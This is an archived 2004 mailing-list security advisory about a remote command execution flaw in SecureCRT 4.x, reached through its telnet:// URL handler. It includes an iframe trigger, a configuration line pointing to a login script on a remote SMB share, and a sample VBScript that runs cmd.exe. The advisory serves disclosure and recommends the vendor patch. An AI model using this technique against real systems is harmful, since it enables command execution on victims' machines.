lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <KFEMINDBKGBEMHACCJHCCEFFFDAA.brett.moore@security-assessment.com>
From: brett.moore at security-assessment.com (Brett Moore)
Subject: SecureCRT - Remote Command Execution

========================================================================
= SecureCRT - Remote Command Execution
=
= Vendor Update:  
= http://www.vandyke.com/download/securecrt/index.html
=
= Affected Software:
=       SecureCRT V4.1, V4.0 (and probably lower)
=
= Public disclosure on November 23, 2004
========================================================================

== Overview ==

In this time of responsible vulnerability disclosure, it's a little
disturbing when a vendor acts on disclosed information but gives no
recognition or even notification that an update has been created due to
the information passed to them.

This advisory is a little late, the update was posted to the vendor
website last month. The only reason I know this, is because I asked and
received a response.
------------------------------------------------------------------------

Brett,

SecureCRT version 4.1.9 was released on Oct. 26, and is
available for public download at the following location:

    http://www.vandyke.com/download/securecrt/index.html

My apologies for not sending a special notice to you upon
release. It was something that slipped off my radar.

If you have any questions, please let us know.

Thanks,
Jake Devenport

------------------------------------------------------------------------

But enough of that, we know the game and still choose to play.

SecureCRT installs a URL PROTOCOL handler into the registry, as
"C:\Program Files\SecureCRT\SecureCRT.EXE" %1

This allows a user to click on a telnet:// link and have it opened from
within their web browser.

This 'telnet execution' can be automated through an html page such as
<iframe src="telnet://192.168.0.1:25">

SecureCRT will accept a command line option (/F) to specify the directory
to use as the configuration folder. It is possible by crafting a special
URL to specify this directory through the html page. An attacker can 
specify a directory accessible through unprotected SMB share, therefore 
allowing them to control the configuration of secureCRT.

SecureCRT allows for 'scripting' using script languages such as vbscript
and has the ability to create a logon script. An attacker can therefore 
create a script to execute commands and have these commands executed on
the targets computer.

== Exploitation ==

There appears to be some filtering around the use of \ in the url->command
line parsing, that appeared to prevent the specification of an SMB share
to use for the configuration. This can be easily bypassed and leads to the
loading of a configuration file from a remote site.

The configuration file contains an entry that specifies the login script
to run which can be set a file on the the remote share;

S:"Script Filename"=\\ipofshare\share\folder\scriptname

And the login script can then contain scripting such as;

# $language = "VBScript"
# $interface = "1.0"

Sub Main
  dim wshShell, boolErr, strErrDesc
  Set wshShell = CreateObject("WScript.Shell")
  run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True)
End Sub

== Solutions ==

- Install the vendor supplied patch.

== Credit ==

Discovered and advised to vandyke.com August 24, 2004 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.

######################################################################
CONFIDENTIALITY NOTICE: 

This message and any attachment(s) are confidential and proprietary. 
They may also be privileged or otherwise protected from disclosure. If 
you are not the intended recipient, advise the sender and delete this 
message and any attachment from your system. If you are not the 
intended recipient, you are not authorised to use or copy this message 
or attachment or disclose the contents to any other person. Views 
expressed are not necessarily endorsed by Security-Assessment.com 
Limited. Please note that this communication does not designate an 
information system for the purposes of the New Zealand Electronic 
Transactions Act 2003.
######################################################################


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ